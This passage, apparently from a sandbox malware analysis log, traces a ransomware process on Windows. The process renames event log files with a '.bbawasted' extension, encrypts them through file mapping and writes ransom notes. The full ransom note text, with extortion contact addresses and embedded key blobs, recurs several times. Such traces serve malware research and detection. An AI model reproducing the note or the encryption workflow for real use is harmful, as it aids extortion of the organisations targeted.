| out: pbBuffer=0x689e38) returned 1 [0193.412] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0193.412] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ac0) returned 1 [0193.412] CryptGenRandom (in: hProv=0x6a6ac0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0193.412] CryptReleaseContext (hProv=0x6a6ac0, dwFlags=0x0) returned 1 [0193.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0193.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0193.423] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0193.423] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]RS97+jJcoJxZCINtWfDfUJNzdmzdXYQrcLeBEVPNmN17Ag1GpJ0bM2e5q+jMWlMK\r\nPwTmsQ27dUS7SHUlgX/n0ge7IGi765oFedx2yBwRfHCqVk27tdT/wi5uqQG21yJX\r\nOPuehz/ecU8k8bXJe+U/Kddfr2QJI9J7X4fJD7+g+0irHncpklj4MwULlaTyQw6Q\r\n+NUDGfhfrXB2uEWKiUzgmzZ6P+a4vnulxHKG8tUSgr9KVdgaxGZZ1wZPmyHtmHqG\r\nxVpIAiGfq0zlFr86n56UXZdBsFGTqvuMF0SHGkQNRp+CqfDZctFF4ALJmSUXwSPM\r\nT50cAfb4UE1ticrltftGi7m8AqIDC/YEPz5g4W2drOfc39HXb+PalxnqzYPkK4Np\r\nrNuJ7yCS2O+Pus9JNAlvHDPNYKCFG735e0JTTEgZXqUbt7Vb/b6bb6aoRvIX55fr\r\nHEGHBnIoTGNJomSFZ2OH5rGku5Ra8NftwgbFfDQiA3VCWGX6zSvMmU1XmuiAX8hy\r\nkuDjhofN8HFS6GPIGCefp5HgmbEaU2BAcanSV0ZaIaB1M1J6+dsZePMWbtP5zhdv\r\nZn2QH7tltzlHRf9Tloo9+1R/X9+InvGoGFYvPyMBYClscjYpm3IbnkPdnzYh7AsZ\r\n9i4SYw/ELq4pYhTAUenPR2DjaeB1B317PvEjUppSGX5=[end_key]\r\nKEEP IT\r\n") returned 984 [0193.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0193.424] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0193.424] SetEndOfFile (hFile=0x28c) returned 1 [0193.427] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0193.427] CloseHandle (hObject=0x28c) returned 1 [0193.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0193.436] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a7ac8 | out: hHeap=0x660000) returned 1 [0193.436] _aulldvrm () returned 0x0 [0193.436] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0193.437] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0193.437] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0193.437] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx") returned 52 [0193.437] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x272) returned 0x6aecf0 [0193.438] lstrcpyW (in: lpString1=0x6aed58, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0193.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0193.438] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0193.438] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0193.438] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0193.438] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0194.127] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0194.128] SetEndOfFile (hFile=0x28c) returned 1 [0194.128] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0194.129] lstrcpyW (in: lpString1=0x6aed58, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0194.129] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.bbawasted")) returned 1 [0194.130] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0194.130] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0194.130] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0194.130] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0194.131] CloseHandle (hObject=0x280) returned 1 [0194.205] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0194.206] CloseHandle (hObject=0x294) returned 1 [0194.206] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0194.206] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0194.207] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0194.207] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0194.207] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0194.207] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0194.207] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0194.216] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0194.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0194.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0194.217] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]etAIhdPh2UbjX4I+cz+0bosMShykNCqB7QsdWdplWkYAl365Kx3mrQu8ev7PC1oW\r\nWDNkSeh6oOTno2iCS/V/x5J58iQUf9pbBMO+RTkecc3uJkxZW39ip8II+2khxzyU\r\n2EA5/Lb4r6h3veH2NTUdByu9tITmVL95CobBea/7TZrUmtOMIuiqAY+4WrUpRvUo\r\nuVDN7HH1uc3BzC16ijfyeDyeAeBgW/6iLhSVzVNVAdGPNyN7EmYy2jhbboNKTzD+\r\nSpbh8gXV/lm9JUoUQ0EDyW2D5L12+CX7Dc12qs9IgmwjZXuH1r6Ya26W/5jl+kbo\r\naHwhuopo3M2CfO7FOwTW0gR83Pe/2vRfkcBAUiEBPedrR5XjAaJlap8XFsLHe4r1\r\niozRe72xLgWTfuBViHJyK0L8yBrmVKAslnOYVotoW9I0tc7T9ZsGnwK5L5jCfpJg\r\nBOONsMr0kbpAfJ+CS6+Mi39M4lwXJcjmh9Xunxu7UZSouzN7ZUTj208RPYv6SVni\r\n5VBzeSD2Fsw8hPRLcwmy2f4JGJHV5lfFScRUFJ7adZ77DmsxTwFj49WaIsOFDf+j\r\nNJqr84OJiEvouBSAvRVM++A3BxIaUVBdRAshi+KHLBARZ0OJtyuAThFkAdLp9KQR\r\n2UMB2rVXQ1O9ILCEm7s8gMwGhbWMeNGH7rc0RIuBZDK=[end_key]\r\nKEEP IT\r\n") returned 984 [0194.217] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0194.217] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0194.348] SetEndOfFile (hFile=0x28c) returned 1 [0194.351] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0194.351] CloseHandle (hObject=0x28c) returned 1 [0194.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0194.359] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9d18 | out: hHeap=0x660000) returned 1 [0194.359] _aulldvrm () returned 0x0 [0194.359] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6460) returned 1 [0194.360] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0194.360] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0194.360] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx") returned 44 [0194.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6aecf0 [0194.360] lstrcpyW (in: lpString1=0x6aed48, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0194.360] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0194.360] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0194.361] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0194.361] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0194.361] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0194.362] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0194.363] SetEndOfFile (hFile=0x28c) returned 1 [0194.364] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.364] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0194.364] lstrcpyW (in: lpString1=0x6aed48, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0194.364] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.bbawasted")) returned 1 [0194.365] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0194.365] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0194.365] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0194.365] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0194.366] CloseHandle (hObject=0x294) returned 1 [0194.727] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0194.728] CloseHandle (hObject=0x280) returned 1 [0194.728] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0194.728] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0194.728] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0194.728] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0194.729] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6ce0) returned 1 [0194.729] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0194.729] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0194.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0194.740] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0194.740] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0194.740] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NOQTvjEtOOHlzMrNdGiyIRDw42en3WVLBHE6NCw/fOIB29rLqmjckJ91gC9+xNJB\r\nLwGk038MWKV12hEWeMKoek1drz8OWBggtC4YWyl5/Qwd8V40K7ICosL8NDKOJs/d\r\nQd8LIaxTZRyht6wVJF+cgNqsy17k1cPnfcw6A8fln3ZaSAR7CB3bNYO4diKCFKQC\r\nMAD41zN96f9LvS+feyNv65IALMmbaungvdaH3lzvBBfIwRQuWiEyxA5XV95rT5c8\r\nmuKoDUJrcD52/pso313fofDBmckpwOD286QkCPCfo5NjSyUvT2wtEN56N7zXjaWE\r\nc+P0bmN1ugv6Z/tSX46YkdaVPpS8Zoxl4TBlrNIlWC+vRHsfyPMdlyBtXoOjULpK\r\nO7W69TH5pn8jhZeY4tmRiRbKG7ZDGLO4Y6ekL7lOIvDe4pypY54cOQmiTDowJ0OG\r\nWCxVguyYQtc4t5owtGrRoGZPE8PQDaAy9N+cQY5eVinZrTGu0k4qohgWs41u1Gue\r\nyeRE2Pd2Te34RgTVNf/BYiLWs4RtSKexM2tOr8j1JTGi2VyHllJ0QRmORqSMj8F+\r\nB6zrUs7odnKHFjNxsDohy5uz8pm/Ul9m/UwFxjc41/tfWSFW/l1ClBQnWXKDrj75\r\nMMYMcRlS1N9RUqksS2ta8ilBUTJ8J63Pb5SmQHJrKBN=[end_key]\r\nKEEP IT\r\n") returned 984 [0194.740] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0194.740] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0194.741] SetEndOfFile (hFile=0x28c) returned 1 [0194.743] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0194.743] CloseHandle (hObject=0x28c) returned 1 [0194.745] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0194.746] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9de0 | out: hHeap=0x660000) returned 1 [0194.746] _aulldvrm () returned 0x0 [0194.746] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0194.746] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0194.746] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0194.747] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx") returned 86 [0194.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b6) returned 0x6aecf0 [0194.747] lstrcpyW (in: lpString1=0x6aed9c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0194.747] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0194.747] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0194.747] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0194.747] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0194.748] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0194.748] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0194.750] SetEndOfFile (hFile=0x28c) returned 1 [0194.750] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.750] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0194.750] lstrcpyW (in: lpString1=0x6aed9c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0194.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.bbawasted")) returned 1 [0194.802] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-program-compatibility-assistant%4compatafterupgrade.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0194.802] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0194.802] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0194.802] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0194.802] CloseHandle (hObject=0x280) returned 1 [0194.855] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0194.856] CloseHandle (hObject=0x294) returned 1 [0194.856] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0194.856] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0194.857] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0194.857] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0194.857] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6928) returned 1 [0194.857] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0194.857] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0194.869] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0194.869] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0194.869] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0194.869] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 